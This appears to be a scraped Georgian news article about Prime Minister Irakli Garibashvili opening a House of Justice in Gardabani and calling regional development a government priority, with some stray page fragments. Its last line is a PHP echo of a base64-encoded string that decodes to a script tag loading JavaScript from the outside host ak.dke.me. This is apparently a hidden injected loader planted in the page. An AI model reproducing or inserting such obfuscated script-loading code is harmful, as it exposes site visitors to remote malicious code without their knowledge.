celsiusi
ავერსი საქკაბელი
საქართველოს პრემიერი მინისტრ ირაკლი ღარიბაშვილის განცხადებით, მოსახლეობის დიდი ნაწილი ცხოვრობს რეგიონებში და მათ თანამედროვე შენობები და სერვისები სჭირდებათ.
 
როგორც პრემიერმა გარდაბანში, იუსტიციის სახლის გახსნის ცერემონიალზე განაცხადა, მომდევნო წლებში მისი მთავრობის ერთ-ერთი მთავარი პრიორიტეტი სწორედ რეგიონების განვითარება იქნება. მთავრობის მეთაურმა იუსტიციის მინისტრს და სამინისტროს თანამშრომლებს გაწეული სამსახურისთვის მადლობა გადაუხადა.
 
„მე მინდა ყველას მოგილოცოთ დღევანდელი დღე, მივულოცო პირველ რიგში ბატონ მინისტრს, ვინაიდან მისთვის ეს მინისტრის რანგში პირველი ასეთი მნიშვნელოვანი ღონისძიებაა, მინდა მივულოცო გარდაბანის მოსახლეობას, ვინაიდან ეს ყველაფერი გაკეთდა ჩვენი მოსახლეობისათვის და განსაკუთრებით ამ რაიონში მცხოვრები მოსახლეობისთვის. როგორც აღინიშნა, ამ შენობაში 450-ზე მეტი სერვისი იქნება ხელმისაწვდომი, ეს ძალიან წარმატებული პროექტია. მინდა კიდევ ერთხელ აღვნიშნო, რომ აქ დასაქმებული ჩვენი თანამშრომლები ძალიან მაღალი კვალიფიკაციით გამოირჩევიან, ისინი ემსახურებიან ჩვენს მოქალაქეებს. ვიცი, რომ მინისტრს აქვს ძალიან საინტერესო ინიციატივები, ახალი იდეები, რომელზეც მუშაობს 10 წლიანი განვითარების გეგმის ფარგლებში, რაც კიდევ უფრო გააუმჯობესებს და მრავალფეროვანს გახდის იმ სერვისებს, რომლითაც ჩვენი მოსახლეობა, ჩვენი მოქალაქეები ისარგებლებენ.
 
ასევე მინდა გითხრათ, რომ რა თქმა უნდა, ჩვენთვის მთავარი აქცენტი, მთავარი პრიორიტეტი არა მხოლოდ დიდი ქალაქების განვითარება, არამედ რეგიონების განვითარება უნდა იყოს, ვინაიდან ჩვენი მოსახლეობის დიდი ნაწილი სწორედ რეგიონებში ცხოვრობს, ამიტომ მათ სჭირდებათ ასეთი თანამედროვე შენობები, თანამედროვე სერვისები და ჩვენი მთავრობის ერთ-ერთი მთავარი პრიორიტეტი მომდევნო წლების განმავლობაში სწორედ რეგიონების განვითარება იქნება“,- განაცხადა ირაკლი ღარიბაშვილმა.
1502
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");